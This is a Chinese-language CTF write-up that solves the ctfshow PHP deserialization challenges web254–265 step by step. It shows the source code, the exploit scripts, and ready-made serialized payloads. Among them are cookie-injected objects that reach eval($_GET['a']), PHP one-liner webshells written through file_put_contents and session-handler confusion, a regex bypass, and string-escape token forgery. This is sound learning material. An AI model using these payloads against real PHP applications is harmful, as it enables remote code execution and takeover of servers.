ctfshow-PHP反序列化

web254

源码

php 复制代码
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-02 17:44:47
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-02 19:29:02
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
//mytime 2023-12-4 0:22
*/
error_reporting(0);//不显示任何错误报告
highlight_file(__FILE__);//高亮显示
include('flag.php');//文件包含一个flag.php
class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;
    public function checkVip(){//返回属性值 真/假
        return $this->isVip;
    }
    public function login($u,$p){//如果属性username等于参数u 属性password等于p 赋值isvip为真
        if($this->username===$u&&$this->password===$p){
            $this->isVip=true;
        }
        return $this->isVip;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){ //如果vip为真 
            global $flag;//在函数内部访问全局变量$flag
            echo "your flag is ".$flag;//输出$flag
        }else{
            echo "no vip, no flag";//如果vip为假输出 不是flag
        }
    }
}
$username=$_GET['username'];//获取参数username和password
$password=$_GET['password'];
if(isset($username) && isset($password)){//如果存在参数值
    $user = new ctfShowUser();//实例化ctfshowuser为user对象
    if($user->login($username,$password)){//调用login方法 返回为真执行下列语句块
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();//这是我们的目的
        }
    }else{
        echo "no vip,no flag";
    }
}

分析半天发现传参username=xxxxx password=xxxxx就可以了

反过来一想在序列化的时候用不上我们的参数 其实就可以判定这道题和反序列化没什么关系


web255

php 复制代码
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-02 17:44:47
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-02 19:29:02
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
mytime 2023/12/4 13:28
*/
//感觉和上一道题没什么区别 
//发现有反序列化了 真开心
error_reporting(0);
highlight_file(__FILE__);
include('flag.php');

class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){ //判断vip是否为真
        return $this->isVip;
    }
    public function login($u,$p){ //如果参数和属性相等返回真
        return $this->username===$u&&$this->password===$p;
    }
    public function vipOneKeyGetFlag(){//只有这个函数才能输出我们想要flag
        if($this->isVip){//vip必须为真
            global $flag;
            echo "your flag is ".$flag;
        }else{
            echo "no vip, no flag";
        }
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);//反序列化 值从cookie的user中传进来 估计得抓包修改ccokie的值 并且
    if($user->login($username,$password)){//这就相当于 cookie中user为序列化的字符串 而且是当前类的,对属性没啥要求就写一个当前类的序列化的poc就行
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
}

代码分析在代码中 现在抓包

呀没有cookie字段呀(我是小白) 找教程

发现浏览器使用f12 应用程序里面有个cookie 在这里可以手动设置cook(学习到了)这能这关根本就没有设置cookie 但是浏览器可以手动提交一个 后端也会进行处理获取cookie

构造poc代码

为什么要进行url编码呢 在cookie中"算截断 所以必须要进行url编码,在传输过程中原始数据和url编码后的数据都能通过浏览器进行传输

exp

php 复制代码
<?php
class ctfShowUser{
    public $username='1';
    public $password='2';
    public $isVip=True;
}
$c=new ctfShowUser();
echo urlencode(serialize($c));

得出poc

php 复制代码
O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22password%22%3Bs%3A1%3A%222%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

放到cookie中

在抓包中的表单中手动添加也可以

传入username=1 password=2 成功

我感觉在构造poc的时候 属性不需要设置username和password的值 只需要这是vip的值是true就可以 尝试一下

构造poc代码

exp

php 复制代码
<?php
class ctfShowUser{
    public $isVip=True;
}
$c=new ctfShowUser();
echo urlencode(serialize($c));

也可以成功


web256

源码

php 复制代码
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-02 17:44:47
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-02 19:29:02
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
mytime 2023/12/4 13:44
*/

error_reporting(0);
highlight_file(__FILE__);
include('flag.php');

class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            if($this->username!==$this->password){//这里必须让username和password的值不一样
                    echo "your flag is ".$flag;
              }
        }else{
            echo "no vip, no flag";
        }
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){//判断传进来的参数
    $user = unserialize($_COOKIE['user']);    //获取cookie里面的user值 并进行反序列化
    if($user->login($username,$password)){//判断传进来的参数和cookie反序列化对象中的值是否一样
        if($user->checkVip()){//在反序列化过程中必须让vip为true
            $user->vipOneKeyGetFlag();//反序列化过程中让username和password的值不一样
        }
    }else{
        echo "no vip,no flag";
    }
}

web255中一共有两种方法 第一种方法在反序列化中 让username和password的值等于1和2 vip为true 就是这道题的答案(其实在web255中真正简便的通关就是第二种方法,第一种繁琐一点)

构造poc代码

exp

php 复制代码
<?php
class ctfShowUser{
    public $username='1';
    public $password='2';
    public $isVip=True;
}
$c=new ctfShowUser();
echo urlencode(serialize($c));

放入cookie中并进行传值 username=1 password=2 成功


web257

php 复制代码
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-02 17:44:47
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-02 20:33:07
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
mytime 2023/12/4 14.30
*/

error_reporting(0);
highlight_file(__FILE__);

class ctfShowUser{
    private $username='xxxxxx';
    private $password='xxxxxx';
    private $isVip=false;
    private $class = 'info';//设置一个class变量

    public function __construct(){
        $this->class=new info();//?在实例化过程中 这是为info实例化?
    }
    public function login($u,$p){//username和password的值必须相等
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){//在反序列化过程中 调用getinfo方法?
        $this->class->getInfo();//必须先让__construct执行 才能执行这个
    }

}

class info{ //原来info类在这里呢
    private $user='xxxxxx';
    public function getInfo(){
        return $this->user;//getinfo在这里呢 返回user的值
    }
}
class backDoor{
    private $code;
    public function getInfo(){
        eval($this->code);//估计这就是我们利用的地方 有eval
    }
}

$username=$_GET['username'];//获取两个参数
$password=$_GET['password'];

if(isset($username) && isset($password)){//如果两个参数存在
    $user = unserialize($_COOKIE['user']);//反序列化cookie中的user
    $user->login($username,$password);//在这里就能确定cookie中必须让ctfshowuser反序列化,这个时候user才是类的ctfshowuser的对象 这样才能执行这条语句
}   //最后发现这最后login没有用
//发现正常反序列化不会执行__construct 不能让class为 info的对象 反过来一看 没必要让info实例化为class 因为 info中没有我们可以利用的
//在触发__destruct前 让calss成为backDoor的对象就行  那就在poc构造的时候让class为backdoor即可
//发现如果想要触发eval 只要随便传user和password vip也随便 只要保证class为backDoor的对象就可以

说实话有点蒙住了 研究发现这道题不需要 username 和password和vip 随便传参数就行 只要能保证 在反序列化的过程中calss为backDdoor的对象就可以

exp

写完这个exp很爽 因为我看大佬们的很长 没必要写那么长

php 复制代码
<?php
class ctfShowUser{
    private $class;//这里也是一个注意点 不能在属性直接进行backDoor实例化 
    public function __construct(){
        $this->class=new backDoor();
    }
}
class backDoor{
    private $code="eval(\$_GET['a']);";
    //注意在这里code 里面的值只是字符串 必须让$当成字符 如果不当成字符 他很容易从url中获取a的参数,容易在这里就会报错 
    //这里还有一个点就是把eval(\$_GET['a']);当成参数 最后变成eval(eval(\$_GET['a'])); 有一个好处这个时候 不用每次都进行构造poc 只需要传参的时候加入一个a参数就可以
}
$ctf=new ctfShowUser();
echo urlencode(serialize($ctf));//url一个道理在cookie中"用来截断 必须进行url编码

poc

php 复制代码
O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A18%3A%22%00ctfShowUser%00class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A17%3A%22eval%28%24_GET%5B%27a%27%5D%29%3B%22%3B%7D%7D

将poc放入cookie中 username和password随便传参 a传参为我们想执行的命令system('tac flag.php'); 单引号必须有 这个tac我换成cat就不行 他们说过滤了我还是多少有点纳闷 哈哈 tac就是反序 cat正序

成功(很开心 获取到flag特别有成就)


web258

php 复制代码
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-02 17:44:47
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-02 21:38:56
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
highlight_file(__FILE__);
class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;
    public $class = 'info';
    public function __construct(){ //只有反序列化无法触发 只能在构造poc的时候触发让clss为backDoor的对象
        $this->class=new info();
    }
	//整体分析后这个函数没什么用
    public function login($u,$p){  
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){ //反序列化触发 并且class为backDoor的对象 就能执行backDoor中的getinfo方法
        $this->class->getInfo();
    }
}
//这个类也没有用
class info{                   
    public $user='xxxxxx';
    public function getInfo(){
        return $this->user;
    }
}                              
class backDoor{
public $code;//在工作poc的时候让code为我们需要执行的命令 或者 eval(\$_GET['a']); 不要忘记这有个反斜杠 让$变为单纯的字符 这样就能成功能当eval()的参数了 不会报错
    public function getInfo(){
        eval($this->code);//这个eval依旧是我们获取flag的地方
    }
}
$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    if(!preg_match('/[oc]:\d+:/i', $_COOKIE['user'])){//加上了过滤条件 o:6 写成o:+6就可以
        $user = unserialize($_COOKIE['user']);//进行反序列化
    }
    $user->login($username,$password);
}
/

和上一题基本一样就是加上了一个过滤条件o:1改成o:+1

错误 exp

php 复制代码
<?php
class ctfShowUser{
    private $class;
    public function __construct(){
        $this->class=new backDoor();
    }
}
class backDoor{
    private $code="eval(\$_GET['a']);";
}
$ctf=serialize(new ctfShowUser());
$ctf=str_replace(':11',':+11',$ctf);
$ctf=str_replace(':8',':+8',$ctf);
echo urlencode($ctf);

正确 exp(当时为了方便直接使用了上一题的exp导致 序列化的class和pricate为私有属性,真是一个教训,研究了20分钟。)

php 复制代码
<?php
class ctfShowUser{
    public $class;
    public function __construct(){
        $this->class=new backDoor();
    }
}
class backDoor{
    public $code="eval(\$_GET['a']);";
}
$ctf=serialize(new ctfShowUser());
$ctf=str_replace('O:', 'O:+',$ctf);
echo $ctf;
echo urlencode($ctf);

poc

php 复制代码
O%3A%2B11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22class%22%3BO%3A%2B8%3A%22backDoor%22%3A1%3A%7Bs%3A4%3A%22code%22%3Bs%3A17%3A%22eval%28%24_GET%5B%27a%27%5D%29%3B%22%3B%7D%7D

将poc传入cookie中 并传参usernmae=任意值 password=任意值 a=我们想要执行的命令 system('tac flag.php');注意 上两道题我还说呢cat什么的不好使 原来都在源代码中

成功


web259

不会 学完ssrf再做 里面还有nc等内容


web260

这题比较简单 只要传入的参数里面包含ctfshow_i_love_36D字符串 这个if语句就为真

php 复制代码
<?php

error_reporting(0);
highlight_file(__FILE__);
include('flag.php');
if(preg_match('/ctfshow_i_love_36D/',serialize($_GET['ctfshow']))){
    echo $flag;
}

看一下serialize序列化的ctfshow_i_love_36D结果

php 复制代码
<?php
$a="ctfshow_i_love_36D"
echo serialize($a)

输出 序列化里面也包括ctfshow_i_love_36D字符串 所以直接就能获取到flag

php 复制代码
s:18:"ctfshow_i_love_36D";

传参 成功


web261

php 复制代码
mytime 2023/12/4 20:48
<?php

highlight_file(__FILE__);
class ctfshowvip{
    public $username;
    public $password;
    public $code;
    //不用管 
    public function __construct($u,$p){//将传进来的参数赋值给属性username和password
        $this->username=$u;
        $this->password=$p;
    }
    //不用管 
    public function __wakeup(){//反序列化会执行到这 有__unserialize这个魔术方法就会绕过
        if($this->username!='' || $this->password!=''){
            die('error');//只要是程序执行到这 就立马暂停程序 所以不能让他俩的值为空
        }
    }
    //不用管 没有将对象当成函数进行调用的情况
    public function __invoke(){//将对象当成函数进行调用就会触发 这里有eval 必须让invoke触发才行 并且code为我们需要执行的命令
        eval($this->code);
    }
    //不用管 用不上没有序列化的情况
    public function __sleep(){//序列化的时候自动调用该方法 会赋值username和password位空 这是我们不想要到的结果
        $this->username='';
        $this->password='';
    }
    //触发时间和wakeup一样
    public function __unserialize($data){//普通的一个方法 将数组中的username和password赋值给属性 这是我们想要的结果 并且code是从username和password中来的 这两个属性结合起来才是我们想要执行的命令
        $this->username=$data['username'];
        $this->password=$data['password'];
        $this->code = $this->username.$this->password;
    }
    public function __destruct(){//反序列化会执行到这
        if($this->code==0x36d){ //如果code=877 0x36d为整形算是弱类型比较 877a 877.php都会判断相等
            file_put_contents($this->username, $this->password);//将password的内容写入到username中
        }
    }
}

unserialize($_GET['vip']); 

审计代码发现:

  1. 有__unserialize()(7.4以上版本才有),在7.4以上版本反序列化会绕过__wakeup()函数。
  2. 在destruct()函数中,有file_put_contents可以写入文件,一句话木马儿
  3. $this->code==0x36d是弱类型比较,0x36d又有没有打引号,所以代表数字,且数字是877,那么877a877.php等可以通过比较;所以设置username='877.php'来通过比较

额外知识

当__serialize和__sleep方法同时存在,序列化时忽略__sleep方法而执行__serialize;当__unserialize方法和__wakeup方法同时存在,反序列化时忽略__wakeup方法而执行__unserialize

__unserialize的参数:当__serialize方法存在时,参数为__serialize的返回数组;当__serialize方法不存在时,参数为实例对象的所有属性值组合而成的数组

exp

php 复制代码
<?php
class ctfshowvip{
    public $username='877.php';
    public $password='<?php eval($_GET[a]);?>';
    public $code;
    }
$c=new ctfshowvip();
echo serialize($c);

输出

php 复制代码
O:10:"ctfshowvip":3:{s:8:"username";s:7:"877.php";s:8:"password";s:23:"";s:4:"code";N;}

估计是一句话木马的原因 不知道哪里给杀没了 手动添加进去就行

php 复制代码
O:10:"ctfshowvip":3:{s:8:"username";s:7:"877.php";s:8:"password";s:23:"<?php eval($_GET[a]);?>";s:4:"code";N;}

传参后 877这个文件就生成出来了 里面的内容就是一句话木马 访问877并以GET方式加入参数a=我们需要执行的命令,先查看一下flag在哪

输出flag文件 成功

在这里提一句一句话木马GET方式POST方式都可以 只是不同的方式提交参数而已

刚刚一句话木马莫名其妙被sha了 看看直接生成url的方式能不能被sha掉

发现直接生成url的方式 一句话木马还在


web262

php 复制代码
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-03 02:37:19
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-03 16:05:38
# @message.php
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}
$f = $_GET['f'];
$m = $_GET['m'];
$t = $_GET['t'];
if(isset($f) && isset($m) && isset($t)){//传入三个参数
    $msg = new message($f,$m,$t);//将message实例化 通过魔术方法将传进来的参数赋值给对象中的属性
    $umsg = str_replace('fuck', 'loveU', serialize($msg));//序列化这个对象生成字符串 并且匹配字符串中的fuck替换为loveu
    setcookie('msg',base64_encode($umsg));//将这个字符串进行base64编码 当做名为msg的cookie传到客户端
    echo 'Your message has been sent';
}
highlight_file(__FILE__);

看代码说是发给客户端一个cookie 随便传一个值发现在本地cookie记录里已经收到了传过来的cookie

分析半天是在不会 看大师傅的视频 听完讲的我就感慨 我就说的吗这个页面无论咋修改也获取不到flag呀 原来是还有一个页面就在最上方给你提示有个message.php 我是发现了做ctf题就要眼观六路耳听八方 越细越好 大师傅的教程没看啥这个逃逸我会 我就没继续看了 按照大师傅说的预期和非预期两种方式

message.php文件

php 复制代码
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-03 15:13:03
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-03 15:17:17
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/
highlight_file(__FILE__);
include('flag.php');
class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}
if(isset($_COOKIE['msg'])){//从cookie中获取msg 如果存在值
    $msg = unserialize(base64_decode($_COOKIE['msg']));//先base64解码 再反序列化为masg
    if($msg->token=='admin'){//如果token为admin就能获取flag
        echo $flag;
    }
}

看到这个页面才知道 这才是获取flag的页面 第一个页面只是生成poc的一个页面 (两种 第一个页面通过构造参数 直接让第一个页面发送过来一个cookie,这也是正常方式,必须通过第一个页面生成cookie 第二种,不正常方式 就是借用第一个页面的代码制作出poc 手动添加到浏览器的ccokie中,直接构造一个token=admin的序列化的字符串 手动添加到cookie中,虽然这种方式简单,但没通过第一个页面,不符合题目规则)

正常方式就是 逃逸方式(正常方式思路,只能通过第一个页面进行生成cookie)

因为第一个页面中提交的参数

一步一步来

exp

php 复制代码
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-03 02:37:19
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-03 16:05:38
# @message.php
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
class message{
    public $from=a;
    public $msg=b;
    public $to=c;
    public $token='admin';
}
    $msg = new message();
	echo $msg;
    //$msg = str_replace('fuck', 'loveU', serialize($msg));//替换
    //setcookie('msg',base64_encode($umsg));
    //echo 'Your message has been sent';

输出

php 复制代码
O:7:"message":4:{s:4:"from";s:1:"a";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:5:"admin";}

毕竟是学习吗那就是用字符串增多逃逸和字符串减少逃逸 都试一试

字符串增多逃逸

四个属性但是我们传参数的时候只能传3个参数 如何让token属性成功反序列化值为admin呢 就用到了字符串逃逸的方式

虽然我们传入3个参数 但是这个对象依旧是有4个属性 token从原始类中获取的值为user

";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:5:"admin";}这是需要吐出来的 于是需要62个fuck

和需要吐出来的尽心拼接

php 复制代码
fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:5:"admin";}

当成第一个参数传值

访问message页面 直接就能获取刚刚发给客户端的cookie

成功

字符串减少逃逸

弄了半天其实用不了减少逃逸

原因 token他会自动添加到对象的属性中 这个时候倒是能通过字符串减少把token的参数user给吃进来 但是后续的我们需要添加的";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:5:"admin";} 通过传参必须要传给最后属性的token中 但是传参我们可控的只有前三个参数 所以无法使用减少逃逸的方式,现在过了一天了 我又发现这道题就是将fuck替换成loveu 并没有loveu替换成fuck 哈哈 只能进行字符串增多逃逸

非预期解就是直接修改构造一个序列化的字符串里面有4个属性 直接在message页面手动修改cookie即可

php 复制代码
O:7:"message":4:{s:4:"from";s:1:"a";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:5:"admin";}

需要base64编码

php 复制代码
Tzo3OiJtZXNzYWdlIjo0OntzOjQ6ImZyb20iO3M6MToiYSI7czozOiJtc2ciO3M6MToiYiI7czoyOiJ0byI7czoxOiJjIjtzOjU6InRva2VuIjtzOjU6ImFkbWluIjt9

直接访问页面无反应

手动添加cookie 成功


web263

登录页面 第一次反序列化遇见这种题型

大师傅说有源码泄露有个www.zip的压缩包

有用的代码

index.php

php 复制代码
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-03 16:28:37
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-06 19:21:45
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/
	error_reporting(0);
	session_start();
	//超过5次禁止登陆
	if(isset($_SESSION['limit'])){
		$_SESSION['limti']>5?die("登陆失败次数超过限制"):$_SESSION['limit']=base64_decode($_COOKIE['limit']);
		//如果session中limit的值大于5就登录失败 否则对cookie中的limit的值进行base64解码赋值给session中的limit
		//cookie的值存储在浏览器中 
		//$_SESSION['limit'] 是用于在用户会话期间存储和跟踪信息的 PHP 会话变量。它的值存储在服务器端,只在当前用户会话中有效。
		//这意味着只有在用户保持登录状态时,$_SESSION['limit'] 的值才会保留,并且在不同页面之间共享。
		$_COOKIE['limit'] = base64_encode(base64_decode($_COOKIE['limit']) +1);//将cookie的值解码后+1再进行编码
	}else{//如果session的值为空 设置名为limit的值为1 session中limit的值也为1
		 setcookie("limit",base64_encode('1'));
		 $_SESSION['limit']= 1;
	}
	
?>

inc.php

php 复制代码
<?php
error_reporting(0);
ini_set('display_errors', 0);
ini_set('session.serialize_handler', 'php'); //session以 PHP 序列化的形式存储在服务器上
date_default_timezone_set("Asia/Shanghai");//时间为上海
session_start();//启动 PHP 会话功能,允许使用 $_SESSION 变量来存储和访问会话数据。
use \CTFSHOW\CTFSHOW; 
require_once 'CTFSHOW.php';
$db = new CTFSHOW([
    'database_type' => 'mysql',
    'database_name' => 'web',
    'server' => 'localhost',
    'username' => 'root',
    'password' => 'root',
    'charset' => 'utf8',
    'port' => 3306,
    'prefix' => '',
    'option' => [
        PDO::ATTR_CASE => PDO::CASE_NATURAL
    ]
]);
//以上进行数据库链接

// sql注入检查
function checkForm($str){
    if(!isset($str)){//参数如果不存在返回true
        return true;
    }else{//如果有参数 使用正则进行一大堆的过滤
    return preg_match("/select|update|drop|union|and|or|ascii|if|sys|substr|sleep|from|where|0x|hex|bin|char|file|ord|limit|by|\`|\~|\!|\@|\#|\\$|\%|\^|\\|\&|\*|\(|\)|\(|\)|\+|\=|\[|\]|\;|\:|\'|\"|\<|\,|\>|\?/i",$str);
    }
}
//定义了一个类
class User{
    public $username;
    public $password;
    public $status;//如果TRUE代表成功 FALSE代表失败
    function __construct($username,$password){//序列化的死后将传入的参数赋值给属性username和password
        $this->username = $username;
        $this->password = $password;
    }
    function setStatus($s){//就是一个普通的方法 将传入的参数赋值给属性status
        $this->status=$s;
    }
    function __destruct(){//反序列化的时候 
        file_put_contents("log-".$this->username, "使用".$this->password."登陆".($this->status?"成功":"失败")."----".date_create()->format('Y-m-d H:i:s'));
    }
}

经过测试不登陆的时候它默认就有cookie id=1

在index.php中

$_SESSION['limti']>5?die("登陆失败次数超过限制"):$_SESSION['limit']=base64_decode($_COOKIE['limit']);

他的session的键名写错了 我们直接就能执行下一步绕过了这个限制 并且成功将cookie的值赋值给session中,在inc的文件中作者特意声明了存储session的方式为php,那就证明php.ini中默认是php_serialize方式 index.php的方式就是默认的,这个时候session从cookie获取的数据会以php_serialize的方式存储在服务器的session文件中

在inc文件中

session_start() 函数会解析 session 文件,因为设置了解析方式为php,就相当于进行了反序列化

并且inc中有一个user类 并且有个__destruct()魔术方法 内容就是生成一个log-$username文件用来记录日志,日志内容就有password参数

这就有思路了

1、构造一个poc 序列化形式的,里面是user的类 username为1.php password为一句话木马 手动通过第一个页面的cookie提交

这个时候服务器会将session信息以php_serialize的方式存储到session文件中

2、直接访问inc页面 因为有 session_start()所以自动使用php方法会以反序列化的方式解析session的键值从而获取数据 因为采用的是反序列化并且我们构造的字符串是user类的,就能出发魔术方法 从而将一句话木马写入一个log-1.php的文件中,php方法会将竖线的后面当成键值 所以要在poc前加入一个|

exp

注意一句话木马不行 必须在后面加上一个phpinfo()不知道是什么原因 记住就行 如果单独的一句话木马不行 就加一个phpino() 大师傅说可能是内部编码的问题 不懂

php 复制代码
<?php
class User{
    public $username;
    public $password;
    function __construct($username,$password){//序列化的死后将传入的参数赋值给属性username和password
        $this->username = $username;
        $this->password = $password;
    }
}
$user = new User('tzy.php','<?php eval($_GET[a]);phpinfo();?>');
echo base64_encode('|'.serialize($user));

开始构造poc

无编码样式

|O:4:"User":2:{s:8:"username";s:5:"tzy.php";s:8:"password";s:33:"<?php eval($_GET[a]);phpinfo();?>";}

base64编码结果

fE86NDoiVXNlciI6Mjp7czo4OiJ1c2VybmFtZSI7czo3OiJ0enkucGhwIjtzOjg6InBhc3N3b3JkIjtzOjMzOiI8P3BocCBldmFsKCRfR0VUW2FdKTtwaHBpbmZvKCk7Pz4iO30=

登陆页面传入cookie后 直接访问check.php(包含inc.php) 直接访问我们生成的日志文件

使用ls看看当前目录下有什么文件

发现有个flag.php文件

查看后获取到了flag

web264

源码

php 复制代码
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-03 02:37:19
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-03 16:05:38
# @message.php
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
session_start();//启动一个session会话 可以使用session变量了
class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){//序列化的时候将三个参数赋值给三个属性
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}
$f = $_GET['f'];//GET方式获取三个参数
$m = $_GET['m'];
$t = $_GET['t'];
if(isset($f) && isset($m) && isset($t)){//如果存在
    $msg = new message($f,$m,$t);//进行序列化
    $umsg = str_replace('fuck', 'loveU', serialize($msg));//如果检测到fuck就替换成lovU 一看就是字符串增多逃逸
    $_SESSION['msg']=base64_encode($umsg);//将结果进行base64编码赋值给session的msg
    echo 'Your message has been sent';
}
highlight_file(__FILE__);

message.php

php 复制代码
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-03 15:13:03
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-03 15:17:17
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
session_start();//启动session会话
highlight_file(__FILE__);
include('flag.php');
class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}
if(isset($_COOKIE['msg'])){//如果cookie中存在名为msg的值
    $msg = unserialize(base64_decode($_SESSION['msg']));//对session中masg的值进行base解码然后反序列化
    if($msg->token=='admin'){
        echo $flag;
    }
}

我们发现 第一个页面会把获取到的参数信息存到session中 mession会将session中的信息进行反序列化,但是有一个前提条件 cookie中有msg值,cookie的msg和session不是一个值 cookie的msg 我们需要手动添加 随意值就行

分析

php 复制代码
//第一个页面正常情况下的序列化的字符串
//O:7:"message":4:{s:4:"from";s:1:"a";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:5:"admin";}
//但是我们只能提交三个参数 无法修改token的值
//只能使用字符串增多逃逸
//需要吐出来的 ";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:5:"admin";} 一共62个字符 每个fuck变成loveu能吐出1个字符
//需要62个fuck
//fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck
//和需要吐出来的字符串进行拼接得出
//O:7:"message":4:{s:4:"from";s:310:"fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:5:"admin";}";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:5:"admin";}
//直接进行传值

exp

php 复制代码
<?php
class message{
    public $from='fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:5:"admin";}';
    public $msg=b;
    public $to=c;
    public $token='admin';
}
    $msg = serialize(new message());
    
    echo $msg;

输出

传值

访问message.php 访问前手动添加一个名为msg的cookie 值任意

成功给获取flag


web265

源码

php 复制代码
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-04 23:52:24
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-05 00:17:08
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
include('flag.php');
highlight_file(__FILE__);
class ctfshowAdmin{
    public $token;
    public $password;
    public function __construct($t,$p){
        $this->token=$t;
        $this->password = $p;
    }
    public function login(){
        return $this->token===$this->password;//三个等于号代表恒等于 类型和值必须都相等
    }
}
$ctfshow = unserialize($_GET['ctfshow']);//反序列化传入来的 ctfshow值
$ctfshow->token=md5(mt_rand());//将任意值进行md5加密 赋值给roken
if($ctfshow->login()){ //如果token恒等于password才能得到flag
    echo $flag;
}

通过代码分析 光值等于还不行必须是恒等于 就要使用引用了

手写poc

